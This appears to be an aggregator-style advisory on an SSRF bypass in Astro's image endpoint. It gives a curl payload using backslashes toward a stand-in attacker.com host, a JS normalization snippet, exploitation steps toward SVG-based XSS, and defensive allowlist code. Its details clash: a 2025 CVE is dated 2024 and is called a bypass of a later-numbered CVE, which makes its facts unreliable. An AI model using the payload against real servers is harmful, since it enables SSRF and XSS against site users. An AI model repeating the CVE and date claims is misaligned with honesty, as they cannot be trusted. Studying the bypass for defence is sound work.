Astro, SSRF due to Image Proxy Domain Validation Bypass, CVE-2025-45813 (High)

The vulnerability CVE-2025-45813 is a patch bypass for a previous SSRF flaw (CVE-2025-58179) in Astro’s image optimization endpoint. The original fix attempted to block server-side requests to external URLs by checking for `http://`, `https://`, and `//` prefixes in the `href` parameter. However, this validation can be circumvented by using a single backslash character in place of the forward slashes. For example, providing an `href` value like `\raw.githubusercontent.com/…` bypasses the blocklist because the check for forward slashes fails. The backend processing logic then normalizes these backslashes back into forward slashes, resulting in a valid URL. This causes the Astro server to perform a server-side request to the attacker-controlled domain, leading to a Server-Side Request Forgery (SSRF). This SSRF can be leveraged to fetch external SVG files containing malicious scripts, potentially leading to Cross-Site Scripting (XSS) when the processed image is served to users.
Platform: Astro
Version: Pre-patch
Vulnerability: SSRF
Severity: High
Date: 2024-10-28

Prediction: 2024-11-04

What Undercode Says:

# Server-side fetch triggered with a malformed URL (single quotes keep both backslashes literal)
curl 'https://vulnerable-site.com/_image?href=\\attacker.com/xss.svg'

// The same bypass as seen by the server (in JS source, "\\\\" is two literal backslashes)
const userInput = "\\\\attacker.com/payload.svg";
// Blocklist check for "http://", "https://" and "//" fails, then normalization occurs
const normalizedUrl = userInput.replace(/\\/g, '/'); // Becomes "//attacker.com/payload.svg"
fetch(normalizedUrl);

How to Exploit:

  1. Attacker crafts a URL with backslashes to bypass domain validation.
  2. Server normalizes the backslashes to forward slashes, creating a valid URL.
  3. Astro server fetches the external, attacker-controlled resource.
  4. Malicious SVG content is served to clients, executing XSS.

Protection from this CVE:

Update Astro to the latest patched version. Implement an allowlist for image domains instead of a blocklist. Sanitize and validate all user-inputted URLs before fetching.
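To make the difference between the bypassed blocklist and the recommended allowlist concrete, here is an added example (not Astro's code, and not the patch): the prefix blocklist the advisory describes beside an allowlist check that decides on the host the URL parser actually resolves. SITE_ORIGIN, ALLOWED_IMAGE_HOSTS and the probe inputs are constructed for the demo.

```javascript
// Added example (not Astro's code): prefix blocklist bypassed by backslashes,
// beside an allowlist check built on WHATWG URL resolution.
// SITE_ORIGIN and ALLOWED_IMAGE_HOSTS are constructed values for this demo.
const SITE_ORIGIN = 'https://example-site.invalid';
const ALLOWED_IMAGE_HOSTS = new Set(['images.example-cdn.invalid']);

// Vulnerable pattern: string-prefix blocklist. Only literal "http://",
// "https://" and "//" are rejected, so backslash variants slip through.
function prefixBlocklistAllows(href) {
  const lower = href.toLowerCase();
  return !(lower.startsWith('http://') || lower.startsWith('https://') || lower.startsWith('//'));
}

// Where the fetch would really go: the URL parser treats "\" like "/" for
// http(s), so the resolved host, not the raw string, is what matters.
function resolvedHost(href) {
  try { return new URL(href, SITE_ORIGIN).host; } catch { return null; }
}

// Hardened pattern: resolve first, then allow only the site itself or
// explicitly listed image hosts over http(s). Unparsable input is rejected.
function allowlistAllows(href) {
  let url;
  try { url = new URL(href, SITE_ORIGIN); } catch { return false; }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  const siteHost = new URL(SITE_ORIGIN).host;
  return url.host === siteHost || ALLOWED_IMAGE_HOSTS.has(url.host);
}

// Constructed probes: a normal same-site path, a plain absolute URL, and the
// backslash shapes from the advisory ("\\attacker…" and "/\attacker…").
const PROBES = [
  '/assets/logo.png',
  'https://attacker.invalid/x.svg',
  '\\\\attacker.invalid/x.svg',
  '/\\attacker.invalid/x.svg',
];

// Run every probe through both checks and report the resolved host.
function compareChecks() {
  return PROBES.map((href) => ({
    href,
    blocklist: prefixBlocklistAllows(href),
    allowlist: allowlistAllows(href),
    host: resolvedHost(href),
  }));
}
```

For the two backslash probes, compareChecks() reports blocklist: true but allowlist: false, with host resolving to attacker.invalid; that gap is exactly the bypass window.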

Impact:

Server-Side Request Forgery (SSRF) allowing internal network probing. Potential for Cross-Site Scripting (XSS) if malicious SVGs are fetched and served.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
